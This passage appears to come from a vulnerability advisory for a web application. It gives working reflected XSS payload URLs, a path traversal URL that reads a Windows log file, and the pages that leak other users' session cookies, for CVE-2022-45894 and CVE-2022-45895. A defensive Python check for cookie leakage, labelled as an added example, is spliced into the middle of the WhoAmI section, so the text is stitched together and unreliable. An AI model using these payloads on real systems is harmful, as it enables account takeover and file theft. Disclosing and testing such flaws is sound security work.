https://$host/Default.aspx?search=*&o=8&page=1&fp=0&r=(0_7_0_%3Cscript%3Ealert(location.origin)%3C/script%3E__)
===============================================================================

Another working payload for the fo parameter was identified:
===============================================================================
https://$host/Default.aspx?search=*&fo=%3Cimg%20onerror=%22javascript:alert(location.origin)%22%20src=%22abcdef%22;//
===============================================================================

It must be mentioned that all metadata filter fields are affected by this
vulnerability.


7) Path Traversal (CVE-2022-45894)
An attacker authenticated with the role Member can navigate to the vulnerable
URL path provided below and inject "..\" sequences to move up directories on the
web server and access local files.

By simply navigating to the link with the injected path traversal payload, an
attacker can download any file on the web server and read its contents.
To verify the vulnerability, the file NetSetup.LOG, which contains details of the
entire
process of joining the domain, was downloaded. The following URL was used:
===============================================================================
https://$host/GetFile.aspx?file=/image/..\..\..\..\..\..\..\..\..\..\Windows\debug\NetSetup.LOG
===============================================================================


8) Information Disclosure (CVE-2022-45895)
a) ON cookie

The information disclosure of the ON cookie was identified on three different
pages of the web application. Since the cookie can be used to access other user
accounts with elevated privileges, it comprises highly confidential information.
It is embedded in the web application's response in different ways and there are
always multiple cookies for different users in the response. Requests to obtain
the sensitive information can be performed with authentication as an arbitrary
user.

The ON cookie was embedded in three pages that are accessible under the
following paths:
 - /Default.aspx?catid=69 (HTML)
 - /Default.aspx?search=*&o=8&page=1&report=1&rlt=0&export=1&t=1661787629149 (CSV)
 - /GetJson.aspx?t=1&display=3&data=69&source=2&o=8&title= (JSON)

As an example the ON cookie leakage is shown in the HTML response. The cookie
value ($VALID_COOKIE) can be identified in the href attribute of the a element
and in the src attribute of the img element.
===============================================================================
[...]
<div><a title="Open Media" tabindex="-1" href="/View.aspx?id=228~$VALID_COOKIE">
<img title="228" data-alt-src="" src="/Media/Images/ClipData/228_$VALID_COOKIE.jpg"/></a>
[...]
===============================================================================

b) WhoAmI

The sensitive data comprises internal information that lets an attacker gain
deeper knowledge about the application.
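For the ON cookie leakage in 8a, the check a defender wants after the fix is a
regression test that fetches the three listed pages as one account and reports
every other account's cookie that still appears in the body, whether in an HTML
attribute, a CSV cell or a JSON string. The following Python script is an added
example, not code from the advisory's authors or from the affected product; the
account names, cookie values and response bodies are constructed placeholders
modelled on the excerpt in 8a (the real cookie format is not stated in the
advisory), and the function names are assumptions:

```python
"""Added example (not the advisory's or the product's code): regression check
for session-cookie leakage across the HTML, CSV and JSON responses named in
8a. Account names, cookie values and response bodies are constructed."""
import csv
import io
import json
import re

# Constructed ON cookie values per test account (placeholders, not real
# tokens); in a real check they come from each account's Set-Cookie header.
KNOWN_COOKIES = {
    "member_a": "ONcookieMemberA0001",
    "editor_b": "ONcookieEditorB0002",
    "admin_c": "ONcookieAdminC00003",
}

# Constructed responses modelled on the 8a excerpt, as fetched by member_a.
RESPONSES = {
    "/Default.aspx?catid=69": ("text/html",
        '<div><a title="Open Media" tabindex="-1" href="/View.aspx?id=228~ONcookieAdminC00003">'
        '<img title="228" data-alt-src="" src="/Media/Images/ClipData/228_ONcookieAdminC00003.jpg"/></a>'
        '<a href="/View.aspx?id=229~ONcookieMemberA0001">own item</a></div>'),
    "/Default.aspx?search=*&o=8&page=1&report=1&rlt=0&export=1&t=1661787629149": ("text/csv",
        "id,title,link\r\n228,Consult,/View.aspx?id=228~ONcookieEditorB0002\r\n"),
    "/GetJson.aspx?t=1&display=3&data=69&source=2&o=8&title=": ("application/json",
        json.dumps({"items": [{"id": 228,
                               "thumb": "/Media/Images/ClipData/228_ONcookieAdminC00003.jpg"}]})),
    "/MyHome.aspx": ("text/html", '<h1 title="member_a">member_a</h1>'),
}


def html_contexts(body, value):
    """Attribute names whose value contains the token (href, src, ...)."""
    return [f"html attribute {m.group(1)}"
            for m in re.finditer(r'([\w-]+)="([^"]*)"', body) if value in m.group(2)]


def csv_contexts(body, value):
    """Column and row of every CSV cell containing the token."""
    hits = []
    for row_no, row in enumerate(csv.DictReader(io.StringIO(body)), start=1):
        hits += [f"csv column {col} row {row_no}"
                 for col, cell in row.items() if cell and value in cell]
    return hits


def json_contexts(body, value):
    """Dotted path of every JSON string containing the token."""
    hits = []

    def walk(node, path):
        if isinstance(node, dict):
            for key, child in node.items():
                walk(child, f"{path}.{key}" if path else key)
        elif isinstance(node, list):
            for i, child in enumerate(node):
                walk(child, f"{path}[{i}]")
        elif isinstance(node, str) and value in node:
            hits.append(f"json key {path}")

    walk(json.loads(body), "")
    return hits


LOCATORS = {"text/html": html_contexts, "text/csv": csv_contexts,
            "application/json": json_contexts}


def find_leaks(responses, known_cookies):
    """(path, cookie owner, context) for every known cookie found in a body."""
    hits = []
    for path, (content_type, body) in responses.items():
        locate = LOCATORS.get(content_type)
        if locate is None:
            continue
        for owner, value in known_cookies.items():
            hits += [(path, owner, ctx) for ctx in locate(body, value)]
    return hits


def cross_account_leaks(responses, known_cookies, requester):
    """The finding in 8a: another account's cookie served to `requester`."""
    return [hit for hit in find_leaks(responses, known_cookies)
            if hit[1] != requester]


if __name__ == "__main__":
    for path, owner, ctx in cross_account_leaks(RESPONSES, KNOWN_COOKIES, "member_a"):
        print(f"LEAK: {owner} cookie in {path} ({ctx})")
```

Run against the constructed responses, the check reports the admin cookie in the
href and src attributes of the HTML page, the editor cookie in the CSV link
column and the admin cookie in the JSON thumbnail path, which is the pattern 8a
describes. The requester's own cookie in a link is listed by `find_leaks` but
not by `cross_account_leaks`; it is still worth fixing, since a session token
in a URL ends up in browser history and referrer headers.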
To verify the vulnerability, it is
sufficient to request the following URL as an authenticated user (any role):
===============================================================================
https://$host/WhoAmI.aspx
===============================================================================

An excerpt of the disclosed information is shown:
================